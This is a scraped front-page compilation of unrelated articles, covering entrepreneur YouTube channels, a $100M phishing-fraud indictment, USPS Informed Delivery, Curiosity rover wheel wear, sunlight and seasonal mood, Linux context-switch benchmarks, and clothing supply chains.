HN Front Page - March 22
Text Size:   Decrease text size   Increase text size    

YouTube channels for entrepreneurs

Illustration by Lovely Creatures

I’m not the kind of guy that consumes typical entrepreneurship pep spam. I cringe whenever I hear the names Tim Ferris, Gary Vaynerchuk or Mark Cuban, not because these people aren’t smart, but because the content associated with their names has become so commoditized it’s completely irrelevant to me.

Too often, content aimed at entrepreneurs is reduced to repeating well-worn catchphrases and habit improvement techniques. Disobedient entrepreneurs are a clever bunch who need clever insight. They want to be exposed to interesting ideas that change their perception of the world and make them feel giddy with the sense of discovery.

It’s this kind of entrepreneur — the disobedient kind — that we’d like to converse with over the pages of this blog. The kind that appreciates weird and feels talked down to by typical “10 habits that changed my life” articles. The kind that prefers sophistication to ease and discovery to the comfort zone.

YouTube is in general quite a populist platform, and straying off the beaten path isn’t always easy. Here are some YouTube channels I genuinely enjoy, and I think you might, too.

Startups

Y Combinator

Interviews with the likes of Mark Zuckerberg, office hours from the world’s top startup consultants and streams from startup conferences — this is a YouTube channel powered by Y Combinator’s extensive network.

How to Start a Startup

Cut-the-crap, actionable, real world advice by top tier startup founders on how to start a business, structured like an online course.

Khosla Ventures

Khosla is one of the best venture capital funds the world, and their YouTube channel is choke-full of excellent interviews with their portfolio companies.

Work in Progress

Super authentic daily talks from Basecamp’s founder and CEO, Jason Fried, and Highrise’s CEO, Nathan Kontny.

If you enjoy Work in Progress, check out Nathan’s personal vlog about building his startup, Highrise.

Business

Some of the best business schools in the world have their own YouTube channels broadcasting interviews and classes. Worth a 👀.

Stanford Business School

Columbia Business School

Berkeley-Hass Business School

Storytelling

Nerdwriter

Nerdwriter creates in-depth videos that explore different storytelling aspects and techniques in film, music and media. It’s fascinating, and the videos are exceptionally well made.

Minutephysics

This channel explains complex physical concepts in 1 minute of hand drawn animation. It’s great to see how every idea can be boiled down into a 1 minute humorous youtube video.

Design & development

Flux

A relatively little-known channel in a very well-known space: designer talk. In Flux, Ran Segall shares his design experience in vlog format, and it’s great.

DevTips

There aren’t many development-centric youtube channels that are great for people who aren’t developers. DevTips is a rare find: super simple, yet super in-depth tutorials about everything programming.

TED Talks

You probably know TED Talks: videos of clever people sharing interesting ideas. Here are some ideas related directly to business and entrepreneurship.

Close this section

Two major US technology firms 'tricked out of $100M'

Hands on keyboardImage copyright Thinkstock
Image caption Evaldas Rimasauskas posed as Asian-based hardware manufacturer to trick staff into wiring him money

A Lithuanian man has been charged with tricking two US technology firms into wiring him $100m (£80.3m) through an email phishing scam.

Posing as an Asian-based manufacturer, Evaldas Rimasauskas tricked staff into transferring money into bank accounts under his control, US officials said.

The companies were not named but were described as US-based multinationals, with one operating in social media.

Officials called it a wake-up call for even "the most sophisticated" firms.

According to the US Department of Justice, Mr Rimasauskas, 48 - who was arrested in Lithuania last week - deceived the firms from at least 2013 up until 2015.

He allegedly registered a company in Latvia which bore the same name as an Asian-based computer hardware manufacturer and opened various accounts in its name at several banks.

The DoJ said: "Thereafter, fraudulent phishing emails were sent to employees and agents of the victim companies, which regularly conducted multimillion-dollar transactions with [the Asian] company."

The emails, which "purported" to be from employees and agents of the Asian firm, and were sent from fake email accounts, directed money for legitimate goods and services into Mr Rimasauskas's accounts, the DoJ said.

The cash was then "wired into different bank accounts" in locations around the world - including Latvia, Cyprus, Slovakia, Lithuania, Hungary and Hong Kong.

He also "forged invoices, contracts and letters" to hide his fraud from the banks he used.

Officials said Mr Rimasauskas siphoned off more than $100m in total, although much of the stolen money has been recovered.

Acting US Attorney Joon H Kim said: "This case should serve as a wake-up call to all companies... that they too can be victims of phishing attacks by cybercriminals.

"And this arrest should serve as a warning to all cybercriminals that we will work to track them down, wherever they are, to hold them accountable."

Close this section

USPS Informed Delivery – Digital Images of Front of Mailpieces

Detailed Images of Your Incoming Mail

Participate in this new USPS® service enhancement test and get images of the mail that will be placed in your mailbox each day. Black and white images of your actual letter-sized mail pieces, processed by USPS® sorting equipment, will be provided to you each morning. Flat-sized pieces, such as catalogues or magazines, may be added in the future. Participation is limited to certain ZIP Codes™ at this time. See the FAQs for more details.

View Your Mail Online or Anywhere from Your Email

Get up to 10 mail piece images in your morning email, which can be viewed on any computer or a smart phone. Get more mail than that? Additional images are available for viewing on your online dashboard - in the same place you track your packages! Don't worry if you are on travel; if you have email or online access, you can see much of the mail that will be delivered to your mailbox.

Close this section

Breaks Observed in Rover Wheel Treads

Mars Science Laboratory Mission Status Report

A routine check of the aluminum wheels on NASA's Curiosity Mars rover has found two small breaks on the rover's left middle wheel-the latest sign of wear and tear as the rover continues its journey, now approaching the 10-mile (16 kilometer) mark.

The mission's first and second breaks in raised treads, called grousers, appeared in a March 19 image check of the wheels, documenting that these breaks occurred after the last check, on Jan. 27.

"All six wheels have more than enough working lifespan remaining to get the vehicle to all destinations planned for the mission," said Curiosity Project Manager Jim Erickson at NASA's Jet Propulsion Laboratory, Pasadena, California. "While not unexpected, this damage is the first sign that the left middle wheel is nearing a wheel-wear milestone,"

The monitoring of wheel damage on Curiosity, plus a program of wheel-longevity testing on Earth, was initiated after dents and holes in the wheels were seen to be accumulating faster than anticipated in 2013. Testing showed that at the point when three grousers on a wheel have broken, that wheel has reached about 60 percent of its useful life. Curiosity already has driven well over that fraction of the total distance needed for reaching the key regions of scientific interest on Mars' Mount Sharp.

Curiosity Project Scientist Ashwin Vasavada, also at JPL, said, "This is an expected part of the life cycle of the wheels and at this point does not change our current science plans or diminish our chances of studying key transitions in mineralogy higher on Mount Sharp."

Curiosity is currently examining sand dunes partway up a geological unit called the Murray formation. Planned destinations ahead include the hematite-containing "Vera Rubin Ridge," a clay-containing geological unit above that ridge, and a sulfate-containing unit above the clay unit.

The rover is climbing to sequentially higher and younger layers of lower Mount Sharp to investigate how the region's ancient climate changed billions of years ago. Clues about environmental conditions are recorded in the rock layers. During its first year on Mars, the mission succeeded at its main goal by finding that the region once offered environmental conditions favorable for microbial life, if Mars has ever hosted life. The conditions in long-lived ancient freshwater Martian lake environments included all of the key chemical elements needed for life as we know it, plus a chemical source of energy that is used by many microbes on Earth.

Through March 20, Curiosity has driven 9.9 miles (16.0 kilometers) since the mission's August 2012 landing on Mars. Studying the transition to the sulfate unit, the farthest-uphill destination, will require about 3.7 miles (6 kilometers) or less of additional driving. For the past four years, rover drive planners have used enhanced methods of mapping potentially hazardous terrains to reduce the pace of damage from sharp, embedded rocks along the rover's route.

Each of Curiosity's six wheels is about 20 inches (50 centimeters) in diameter and 16 inches (40 centimeters) wide, milled out of solid aluminum. The wheels contact ground with a skin that's about half as thick as a U.S. dime, except at thicker treads. The grousers are 19 zigzag-shaped treads that extend about a quarter inch (three-fourths of a centimeter) outward from the skin of each wheel. The grousers bear much of the rover's weight and provide most of the traction and ability to traverse over uneven terrain.

JPL, a division of Caltech in Pasadena, California, manages NASA's Mars Science Laboratory Project for NASA's Science Mission Directorate, Washington, and built the project's rover, Curiosity. For more information about the mission, visit:

http://mars.jpl.nasa.gov/msl/

News Media Contact

Guy Webster
Jet Propulsion Laboratory, Pasadena, Calif.
818-354-6278
guy.webster@jpl.nasa.gov

2017-079

Close this section

The relationship between our moods and sunlight

Enlarge / If it's dark outside seemingly all the time, you must find ways to cope.
How do Scandinavians deal with long, dark winters? For Mosaic, Linda Geddes explores what this might teach us about the relationship between our moods and sunlight. The story is republished here under a Creative Commons license.

The inhabitants of Rjukan in southern Norway have a complex relationship with the Sun. “More than other places I’ve lived, they like to talk about the Sun: when it’s coming back, if it’s a long time since they’ve seen the Sun,” says artist Martin Andersen. “They’re a little obsessed with it.” Possibly, he speculates, it’s because for approximately half the year, you can see the sunlight shining high up on the north wall of the valley: “It is very close, but you can’t touch it,” he says. As autumn wears on, the light moves higher up the wall each day, like a calendar marking off the dates to the winter solstice. And then as January, February, and March progress, the sunlight slowly starts to inch its way back down again.

Rjukan was built between 1905 and 1916, after an entrepreneur called Sam Eyde bought the local waterfall (known as the smoking waterfall) and constructed a hydroelectric power plant there. Factories producing artificial fertiliser followed. But the managers of these worried that their staff weren’t getting enough Sun—and eventually they constructed a cable car in order to give them access to it.

When Martin moved to Rjukan in August 2002, he was simply looking for a temporary place to settle with his young family that was close to his parents’ house and where he could earn some money. He was drawn to the three-dimensionality of the place: a town of 3,000, in the cleft between two towering mountains—the first seriously high ground you reach as you travel west of Oslo.

But the departing Sun left Martin feeling gloomy and lethargic. It still rose and set each day and provided some daylight—unlike in the far north of Norway, where it is dark for months at a time—but the Sun never climbed high enough for the people of Rjukan to actually see it or feel its warming rays directly on their skin.

As summer turned to autumn, Martin found himself pushing his two-year-old daughter’s buggy further and further down the valley each day, chasing the vanishing sunlight. “I felt it very physically; I didn’t want to be in the shade,” says Martin, who runs a vintage shop in Rjukan town centre. If only someone could find a way of reflecting some sunlight down into the town, he thought. Most people living at temperate latitudes will be familiar with Martin’s sense of dismay at autumn’s dwindling light. Few would have been driven to build giant mirrors above their town to fix it.

The greyness

What is it about the flat, gloomy greyness of winter that seems to penetrate our skin and dampen our spirits, at least at higher latitudes? The idea that our physical and mental health varies with the seasons and sunlight goes back a long way. The Yellow Emperor’s Classic of Medicine, a treatise on health and disease that’s estimated to have been written in around 300 BCE, describes how the seasons affect all living things and suggests that during winter—a time of conservation and storage—one should “retire early and get up with the sunrise... Desires and mental activity should be kept quiet and subdued, as if keeping a happy secret.” And in his Treatise on Insanity, published in 1806, the French physician Philippe Pinel noted a mental deterioration in some of his psychiatric patients “when the cold weather of December and January set in."

Today, this mild form of malaise is often called the winter blues. And for a minority of people who suffer from seasonal affective disorder (SAD), winter is quite literally depressing. First described in the 1980s, the syndrome is characterised by recurrent depressions that occur annually at the same time each year. Most psychiatrists regard SAD as being a subclass of generalised depression or, in a smaller proportion of cases, bipolar disorder.

Seasonality is reported by approximately 10 to 20 percent of people with depression and 15 to 22 percent of those with bipolar disorder. “People often don’t realise that there is a continuum between the winter blues—which is a milder form of feeling down, [sleepier and less energetic]—and when this is combined with a major depression,” says Anna Wirz-Justice, an emeritus professor of psychiatric neurobiology at the Centre for Chronobiology in Basel, Switzerland. Even healthy people who have no seasonal problems seem to experience this low-amplitude change over the year, with worse mood and energy during autumn and winter and an improvement in spring and summer, she says.

Why should darker months trigger this tiredness and low mood in so many people? There are several theories, none of them definitive, but most relate to the circadian clock—the roughly 24-hour oscillation in our behaviour and biology that influences when we feel hungry, sleepy or active. This is no surprise given that the symptoms of the winter blues seem to be associated with shortening days and longer nights and that bright light seems to have an antidepressive effect. One idea is that some people’s eyes are less sensitive to light, so once light levels fall below a certain threshold, they struggle to synchronise their circadian clock with the outside world. Another is that some people produce more of a hormone called melatonin during winter than in summer—just like certain other mammals that show strong seasonal patterns in their behaviour.

However, the leading theory is the ‘phase-shift hypothesis’: the idea that shortened days cause the timing of our circadian rhythms to fall out of sync with the actual time of day, because of a delay in the release of melatonin. Levels of this hormone usually rise at night in response to darkness, helping us to feel sleepy, and are suppressed by the bright light of morning. “If someone’s biological clock is running slow and that melatonin rhythm hasn’t fallen, then their clock is telling them to keep on sleeping even though their alarm may be going off and life is demanding that they wake up,” says Kelly Rohan, a professor of psychology at the University of Vermont. Precisely why this should trigger feelings of depression is still unclear. One idea is that this tiredness could then have unhealthy knock-on effects. If you’re having negative thoughts about how tired you are, this could trigger a sad mood, loss of interest in food, and other symptoms that could cascade on top of that.

However, recent insights into how birds and small mammals respond to changes in day length have prompted an alternative explanation. According to Daniel Kripke, an emeritus professor of psychiatry at the University of California, San Diego, when melatonin strikes a region of the brain called the hypothalamus, this alters the synthesis of another hormone—active thyroid hormone—that regulates all sorts of behaviours and bodily processes.

When dawn comes later in the winter, the end of melatonin secretion drifts later, says Kripke. From animal studies, it appears that high melatonin levels just after the time an animal wakes up strongly suppress the making of active thyroid hormone—and lowering thyroid levels in the brain can cause changes in mood, appetite, and energy. For instance, thyroid hormone is known to influence serotonin, a neurotransmitter that regulates mood. Several studies have shown that levels of brain serotonin in humans are at their lowest in the winter and highest in the summer. In 2016, scientists in Canada discovered that people with severe SAD show greater seasonal changes in a protein that terminates the action of serotonin than others with no or less severe symptoms, suggesting that the condition and the neurotransmitter are linked.

It’s possible that many of these mechanisms are at work, even if the precise relationships haven’t been fully teased apart yet. But regardless of what causes winter depression, bright light—particularly when delivered in the early morning—seems to reverse the symptoms.

"...collect the sunlight and then spread it like a headlamp beam over the town of Rjukan and its merry inhabitants."
Enlarge / "...collect the sunlight and then spread it like a headlamp beam over the town of Rjukan and its merry inhabitants."

“I like the Sun”

It was a bookkeeper called Oscar Kittilsen who first came up with the idea of erecting large rotatable mirrors on the northern side of the valley, where they would be able to “first collect the sunlight and then spread it like a headlamp beam over the town of Rjukan and its merry inhabitants."

A month later, on November 28, 1913, a newspaper story described Sam Eyde pushing the same idea, although it was another hundred years before it was realised. Instead, in 1928 Norsk Hydro erected a cable car as a gift to the townspeople, so that they could get high enough to soak up some sunlight in winter. Instead of bringing the Sun to the people, the people would be brought to the sunshine.

Martin Andersen didn’t know all of this. But after receiving a small grant from the local council to develop the idea, he learned about this history and started to develop some concrete plans. These involved a heliostat: a mirror mounted in such a way that it turns to keep track of the Sun while continually reflecting its light down toward a set target—in this case, Rjukan town square.

The three mirrors, each measuring 17m2, stand proud upon the mountainside above the town. In January, the Sun is only high enough to bring light to the square for two hours per day, from midday until 2pm, but the beam produced by the mirrors is golden and welcoming. Stepping into the sunlight after hours in permanent shade, I become aware of just how much it shapes our perception of the world. Suddenly, things seem more three-dimensional; I feel transformed into one of those ‘merry inhabitants’ that Kittilsen imagined. When I leave the sunlight, Rjukan feels a flatter, greyer place.

As far back as the sixth century, historians were describing seasonal peaks of joy and sorrow among Scandinavians, brought about by the continuous daylight of summer and its almost complete absence in winter.

Three hundred and fifty miles south of Rjukan, and at roughly the same latitude as Edinburgh, Moscow, and Vancouver, lies Malmö in southern Sweden. In Sweden, an estimated 8 percent of the population suffers from SAD, with a further 11 percent said to suffer the winter blues.

In early January, the Sun rises at around 8:30am and sets just before 4pm. For Anna Odder Milstam, an English and Swedish teacher, this means getting up and arriving at work before dawn for several months of the year. “During the winter, we just feel so tired,” she says. “The children struggle with it as well. They are less alert and less active at this time of year.”

Anna picks me up from my city-centre hotel at 7:45am. It’s early January and still dark, but as dawn begins to break it reveals a leaden sky and the threat of snow. I ask if she’s a winter person and she visibly shudders. “No, I am not,” she replies stiffly. “I like the Sun.”

Lindeborg School, where Anna teaches, caters for approximately 700 pupils, ranging from preschool age through to 16. Since there’s little the school can do about its high latitude and brooding climate, the local authority is instead trying to recreate the psychological effects of sunshine on its pupils artificially.

When I walk into Anna’s classroom at 8:50am, my eyes instinctively crinkle, and I feel myself recoiling. It’s as if someone has thrown open the curtains on a darkened bedroom. Yet as my eyes adjust to the bright light, I see the curtains in this classroom are firmly closed. In front of me sits a class of 14-year-olds at evenly spaced desks, watching my reaction with mild amusement. They’re part of an experiment investigating whether artificial lighting can improve their alertness and sleep and ultimately result in improved grades.

“We can all feel that if we’re not very alert at school or work, we don’t perform at our top level,” says Olle Strandberg, a developer at Malmö’s Department of Internal Services, which is leading the project. “So if there is any possibility of waking the students up during the wintertime, we’re keen to take it.”

Since October 2015, Anna’s classroom has been fitted with ceiling lights that change in colour and intensity to simulate being outside on a bright day in springtime. Developed by a company called BrainLit, the ultimate goal is to create a system that is tailored to the individual, monitoring the type of light they’ve been exposed to through the course of a day and then adjusting the lights to optimise their health and productivity.

When Anna’s pupils enter the classroom at 8:10am, the lights are a bright bluish-white to wake them up. They then grow gradually more intense as the morning progresses, dimming slightly in the run-up to lunch to ease the transition to the gloomier light outside. Immediately after lunch the classroom is intense whitish-blue again—“to combat the post-lunch coma” jokes Strandberg—but then the lights gradually dim and become more yellow as the afternoon progresses.

Bright light in the morning suppresses any residual melatonin that could be making us sleepy and provides a signal to the brain’s master clock that keeps it synchronised with the 24-hour cycle of light and dark. The idea is it therefore strengthens our internal rhythms so that when night comes around again, we start to feel sleepy at the correct time.

Already, there’s some preliminary evidence that it’s having an effect on the pupils’ sleep. In a small pilot study, 14 pupils from Anna’s class and 14 from a neighbouring class that doesn’t have the lighting system were given Jawbone activity trackers and asked to keep sleep diaries for two weeks. During the second week, significant differences started to emerge between the two groups in terms of their sleep, with Anna’s pupils waking up fewer times during the night and spending a greater proportion of their time in bed asleep.

No one knows whether the lighting system is affecting the students’ exam scores or even how to measure that. But it might. Besides suppressing melatonin and warding off any residual sleepiness, recent studies suggest that bright light acts as a stimulant to the brain. Gilles Vandewalle and colleagues at the University of Liège in Belgium asked volunteers to perform various tasks in a brain scanner while exposing them to pulses of bright white light or no light. After exposure to white light, the brain was in a more active state in those areas that were involved in the task. Although they didn’t measure the volunteers’ test performances directly, if you are able to recruit a greater brain response, then your performance is likely to be better: you will be faster or more accurate, Vandewalle says.

Anna agrees. Anecdotally, she reports that her students are more alert. “They’ve expressed that they feel more able to concentrate and they are more focused,” she says. “I also look forward to going into my classroom in the morning, because I’ve noticed that I feel better when I go in there—more awake.”

Close this section

How long does it take to make a context switch? (2010)

That's a interesting question I'm willing to spend some of my time on. Someone at StumbleUpon emitted the hypothesis that with all the improvements in the Nehalem architecture (marketed as Intel i7), context switching would be much faster. How would you devise a test to empirically find an answer to this question? How expensive are context switches anyway? (tl;dr answer: very expensive)

The lineup

April 21, 2011 update: I added an "extreme" Nehalem and a low-voltage Westmere.
April 1, 2013 update: Added an Intel Sandy Bridge E5-2620.
I've put 4 different generations of CPUs to test:
  • A dual Intel 5150 (Woodcrest, based on the old "Core" architecture, 2.67GHz). The 5150 is a dual-core, and so in total the machine has 4 cores available. Kernel: 2.6.28-19-server x86_64.
  • A dual Intel E5440 (Harpertown, based on the Penrynn architecture, 2.83GHz). The E5440 is a quad-core so the machine has a total of 8 cores. Kernel: 2.6.24-26-server x86_64.
  • A dual Intel E5520 (Gainestown, based on the Nehalem architecture, aka i7, 2.27GHz). The E5520 is a quad-core, and has HyperThreading enabled, so the machine has a total of 8 cores or 16 "hardware threads". Kernel: 2.6.28-18-generic x86_64.
  • A dual Intel X5550 (Gainestown, based on the Nehalem architecture, aka i7, 2.67GHz). The X5550 is a quad-core, and has HyperThreading enabled, so the machine has a total of 8 cores or 16 "hardware threads". Note: the X5550 is in the "server" product line. This CPU is 3x more expensive than the previous one. Kernel: 2.6.28-15-server x86_64.
  • A dual Intel L5630 (Gulftown, based on the Westmere architecture, aka i7, 2.13GHz). The L5630 is a quad-core, and has HyperThreading enabled, so the machine has a total of 8 cores or 16 "hardware threads". Note: the L5630 is a "low-voltage" CPU. At equal price, this CPU is in theory 16% less powerful than a non-low-voltage CPU. Kernel: 2.6.32-29-server x86_64.
  • A dual Intel E5-2620 (Sandy Bridge-EP, based on the Sandy Bridge architecture, aka E5, 2Ghz). The E5-2620 is a hexa-core, has HyperThreading, so the machine has a total of 12 cores, or 24 "hardware threads". Kernel: 3.4.24 x86_64.
As far as I can say, all CPUs are set to a constant clock rate (no Turbo Boost or anything fancy). All the Linux kernels are those built and distributed by Ubuntu.

First idea: with syscalls (fail)

My first idea was to make a cheap system call many times in a row, time how long it took, and compute the average time spent per syscall. The cheapest system call on Linux these days seems to be gettid. Turns out, this was a naive approach since system calls don't actually cause a full context switch anymore nowadays, the kernel can get away with a "mode switch" (go from user mode to kernel mode, then back to user mode). That's why when I ran my first test program, vmstat wouldn't show a noticeable increase in number of context switches. But this test is interesting too, although it's not what I wanted originally.

Source code: timesyscall.c Results:

  • Intel 5150: 105ns/syscall
  • Intel E5440: 87ns/syscall
  • Intel E5520: 58ns/syscall
  • Intel X5550: 52ns/syscall
  • Intel L5630: 58ns/syscall
  • Intel E5-2620: 67ns/syscall
Now that's nice, more expensive CPUs perform noticeably better (note however the slight increase in cost on Sandy Bridge). But that's not really what we wanted to know. So to test the cost of a context switch, we need to force the kernel to de-schedule the current process and schedule another one instead. And to benchmark the CPU, we need to get the kernel to do nothing but this in a tight loop. How would you do this?

Second idea: with futex

The way I did it was to abuse futex (RTFM). futex is the low level Linux-specific primitive used by most threading libraries to implement blocking operations such as waiting on a contended mutexes, semaphores that run out of permits, condition variables and friends. If you would like to know more, go read Futexes Are Tricky by Ulrich Drepper. Anyways, with a futex, it's easy to suspend and resume processes. What my test does is that it forks off a child process, and the parent and the child take turn waiting on the futex. When the parent waits, the child wakes it up and goes on to wait on the futex, until the parent wakes it and goes on to wait again. Some kind of a ping-pong "I wake you up, you wake me up...".

Source code: timectxsw.c Results:

  • Intel 5150: ~4300ns/context switch
  • Intel E5440: ~3600ns/context switch
  • Intel E5520: ~4500ns/context switch
  • Intel X5550: ~3000ns/context switch
  • Intel L5630: ~3000ns/context switch
  • Intel E5-2620: ~3000ns/context switch
Note: those results include the overhead of the futex system calls.

Now you must take those results with a grain of salt. The micro-benchmark does nothing but context switching. In practice context switching is expensive because it screws up the CPU caches (L1, L2, L3 if you have one, and the TLB – don't forget the TLB!).

CPU affinity

Things are harder to predict in an SMP environment, because the performance can vary wildly depending on whether a task is migrated from one core to another (especially if the migration is across physical CPUs). I ran the benchmarks again but this time I pinned the processes/threads on a single core (or "hardware thread"). The performance speedup is dramatic.

Source code: cpubench.sh Results:

  • Intel 5150: ~1900ns/process context switch, ~1700ns/thread context switch
  • Intel E5440: ~1300ns/process context switch, ~1100ns/thread context switch
  • Intel E5520: ~1400ns/process context switch, ~1300ns/thread context switch
  • Intel X5550: ~1300ns/process context switch, ~1100ns/thread context switch
  • Intel L5630: ~1600ns/process context switch, ~1400ns/thread context switch
  • Intel E5-2620: ~1600ns/process context switch, ~1300ns/thread context siwtch
Performance boost: 5150: 66%, E5440: 65-70%, E5520: 50-54%, X5550: 55%, L5630: 45%, E5-2620: 45%.

The performance gap between thread switches and process switches seems to increase with newer CPU generations (5150: 7-8%, E5440: 5-15%, E5520: 11-20%, X5550: 15%, L5630: 13%, E5-2620: 19%). Overall the penalty of switching from one task to another remains very high. Bear in mind that those artificial tests do absolutely zero computation, so they probably have 100% cache hit in L1d and L1i. In the real world, switching between two tasks (threads or processes) typically incurs significantly higher penalties due to cache pollution. But we'll get back to this later.

Threads vs. processes

After producing the numbers above, I quickly criticized Java applications, because it's fairly common to create shitloads of threads in Java, and the cost of context switching becomes high in such applications. Someone retorted that, yes, Java uses lots of threads but threads have become significantly faster and cheaper with the NPTL in Linux 2.6. They said that normally there's no need to do a TLB flush when switching between two threads of the same process. That's true, you can go check the source code of the Linux kernel (switch_mm in mmu_context.h):
static inline void switch_mm(struct mm_struct *prev, struct mm_struct *next,
                             struct task_struct *tsk)
{
       unsigned cpu = smp_processor_id();

       if (likely(prev != next)) {
               [...]
               load_cr3(next->pgd);
       } else {
               [don't typically reload cr3]
       }
}
In this code, the kernel expects to be switching between tasks that have different memory structures, in which cases it updates CR3, the register that holds a pointer to the page table. Writing to CR3 automatically causes a TLB flush on x86.

In practice though, with the default kernel scheduler and a busy server-type workload, it's fairly infrequent to go through the code path that skips the call to load_cr3. Plus, different threads tend to have different working sets, so even if you skip this step, you still end up polluting the L1/L2/L3/TLB caches. I re-ran the benchmark above with 2 threads instead of 2 processes (source: timetctxsw.c) but the results aren't significantly different (this varies a lot depending on scheduling and luck, but on average on many runs it's typically only 100ns faster to switch between threads if you don't set a custom CPU affinity).

Indirect costs in context switches: cache pollution

The results above are in line with a paper published a bunch of guys from University of Rochester: Quantifying The Cost of Context Switch. On an unspecified Intel Xeon (the paper was written in 2007, so the CPU was probably not too old), they end up with an average time of 3800ns. They use another method I thought of, which involves writing / reading 1 byte to / from a pipe to block / unblock a couple of processes. I thought that (ab)using futex would be better since futex is essentially exposing some scheduling interface to userland.

The paper goes on to explain the indirect costs involved in context switching, which are due to cache interference. Beyond a certain working set size (about half the size of the L2 cache in their benchmarks), the cost of context switching increases dramatically (by 2 orders of magnitude).

I think this is a more realistic expectation. Not sharing data between threads leads to optimal performance, but it also means that every thread has its own working set and that when a thread is migrated from one core to another (or worse, across physical CPUs), the cache pollution is going to be costly. Unfortunately, when an application has many more active threads than hardware threads, this is happening all the time. That's why not creating more active threads than there are hardware threads available is so important, because in this case it's easier for the Linux scheduler to keep re-scheduling the same threads on the core they last used ("weak affinity").

Having said that, these days, our CPUs have much larger caches, and can even have an L3 cache.

  • 5150: L1i & L1d = 32K each, L2 = 4M
  • E5440: L1i & L1d = 32K each, L2 = 6M
  • E5520: L1i & L1d = 32K each, L2 = 256K/core, L3 = 8M (same for the X5550)
  • L5630: L1i & L1d = 32K each, L2 = 256K/core, L3 = 12M
  • E5-2620: L1i & L1d = 64K each, L2 = 256K/core, L3 = 15M
Note that in the case of the E5520/X5550/L5630 (the ones marketed as "i7") as well as the Sandy Bridge E5-2520, the L2 cache is tiny but there's one L2 cache per core (with HT enabled, this gives us 128K per hardware thread). The L3 cache is shared for all cores that are on each physical CPU.

Having more cores is great, but it also increases the chance that your task be rescheduled onto a different core. The cores have to "migrate" cache lines around, which is expensive. I recommend reading What Every Programmer Should Know About Main Memory by Ulrich Drepper (yes, him again!) to understand more about how this works and the performance penalties involved.

So how does the cost of context switching increase with the size of the working set? This time we'll use another micro-benchmark, timectxswws.c that takes in argument the number of pages to use as a working set. This benchmark is exactly the same as the one used earlier to test the cost of context switching between two processes except that now each process does a memset on the working set, which is shared across both processes. Before starting, the benchmark times how long it takes to write over all the pages in the working set size requested. This time is then discounted from the total time taken by the test. This attempts to estimate the overhead of overwriting pages across context switches.

Here are the results for the 5150:As we can see, the time needed to write a 4K page more than doubles once our working set is bigger than what we can fit in the L1d (32K). The time per context switch keeps going up and up as the working set size increases, but beyond a certain point the benchmark becomes dominated by memory accesses and is no longer actually testing the overhead of a context switch, it's simply testing the performance of the memory subsystem.

Same test, but this time with CPU affinity (both processes pinned on the same core):Oh wow, watch this! It's an order of magnitude faster when pinning both processes on the same core! Because the working set is shared, the working set fits entirely in the 4M L2 cache and cache lines simply need to be transfered from L2 to L1d, instead of being transfered from core to core (potentially across 2 physical CPUs, which is far more expensive than within the same CPU).

Now the results for the i7 processor:Note that this time I covered larger working set sizes, hence the log scale on the X axis.

So yes, context switching on i7 is faster, but only for so long. Real applications (especially Java applications) tend to have large working sets so typically pay the highest price when undergoing a context switch. Other observations about the Nehalem architecture used in the i7:

  • Going from L1 to L2 is almost unnoticeable. It takes about 130ns to write a page with a working set that fits in L1d (32K) and only 180ns when it fits in L2 (256K). In this respect, the L2 on Nehalem is more of a "L1.5", since its latency is simply not comparable to that of the L2 of previous CPU generations.
  • As soon as the working set increases beyond 1024K, the time needed to write a page jumps to 750ns. My theory here is that 1024K = 256 pages = half of the TLB of the core, which is shared by the two HyperThreads. Because now both HyperThreads are fighting for TLB entries, the CPU core is constantly doing page table lookups.
Speaking of TLB, the Nehalem has an interesting architecture. Each core has a 64 entry "L1d TLB" (there's no "L1i TLB") and a unified 512 entry "L2TLB". Both are dynamically allocated between both HyperThreads.

Virtualization

I was wondering how much overhead there is when using virtualization. I repeated the benchmarks for the dual E5440, once in a normal Linux install, once while running the same install inside VMware ESX Server. The result is that, on average, it's 2.5x to 3x more expensive to do a context switch when using virtualization. My guess is that this is due to the fact that the guest OS can't update the page table itself, so when it attempts to change it, the hypervisor intervenes, which causes an extra 2 context switches (one to get inside the hypervisor, one to get out, back to the guest OS).

This probably explains why Intel added the EPT (Extended Page Table) on the Nehalem, since it enables the guest OS to modify its own page table without help of the hypervisor, and the CPU is able to do the end-to-end memory address translation on its own, entirely in hardware (virtual address to "guest-physical" address to physical address).

Parting words

Context switching is expensive. My rule of thumb is that it'll cost you about 30µs of CPU overhead. This seems to be a good worst-case approximation. Applications that create too many threads that are constantly fighting for CPU time (such as Apache's HTTPd or many Java applications) can waste considerable amounts of CPU cycles just to switch back and forth between different threads. I think the sweet spot for optimal CPU use is to have the same number of worker threads as there are hardware threads, and write code in an asynchronous / non-blocking fashion. Asynchronous code tends to be CPU bound, because anything that would block is simply deferred to later, until the blocking operation completes. This means that threads in asynchronous / non-blocking applications are much more likely to use their full time quantum before the kernel scheduler preempts them. And if there's the same number of runnable threads as there are hardware threads, the kernel is very likely to reschedule threads on the same core, which significantly helps performance.

Another hidden cost that severely impacts server-type workloads is that after being switched out, even if your process becomes runnable, it'll have to wait in the kernel's run queue until a CPU core is available for it. Linux kernels are often compiled with HZ=100, which entails that processes are given time slices of 10ms. If your thread has been switched out but becomes runnable almost immediately, and there are 2 other threads before it in the run queue waiting for CPU time, your thread may have to wait up to 20ms in the worst scenario to get CPU time. So depending on the average length of the run queue (which is reflected in load average), and how long your threads typically run before getting switched out again, this can considerably impact performance.

It is illusory to imagine that NPTL or the Nehalem architecture made context switching cheaper in real-world server-type workloads. Default Linux kernels don't do a good job at keeping CPU affinity, even on idle machines. You must explore alternative schedulers or use taskset or cpuset to control affinity yourself. If you're running multiple different CPU-intensive applications on the same server, manually partitioning cores across applications can help you achieve very significant performance gains.

Close this section

Most items of clothing have complicated international journeys

Pink dressImage copyright Inditex
Image caption This Zara dress had been to at least five countries before it ended up on a shop hanger

"Made in Morocco" says the label on the pink Zara shirt dress.

While this may be where the garment was finally sewn together, it has already been to several other countries.

In fact, it's quite possible this piece of clothing is better travelled than you. If it was human, it would have certainly journeyed far enough to have earned itself some decent air miles.

The material used to create it came from lyocell - a sustainable alternative to cotton. The trees used to make this fibre come mainly from Europe, according to Lenzing, the Austrian supplier that Zara-owner Inditex uses.

These fibres were shipped to Egypt, where they were spun into yarn. This yarn was then sent to China where it was woven into a fabric. This fabric was then sent to Spain where it was dyed, in this case pink. The fabric was then shipped to Morocco to be cut into the various parts of the dress and then sewn together.

After this, it was sent back to Spain where it was packaged and then sent to the UK, the US or any one of the 93 countries where Inditex has shops.

From dresses to t-shirts and trousers, most items of clothing sold around the world will have had similarly complicated journeys.

In fact, they're likely to be even more convoluted.

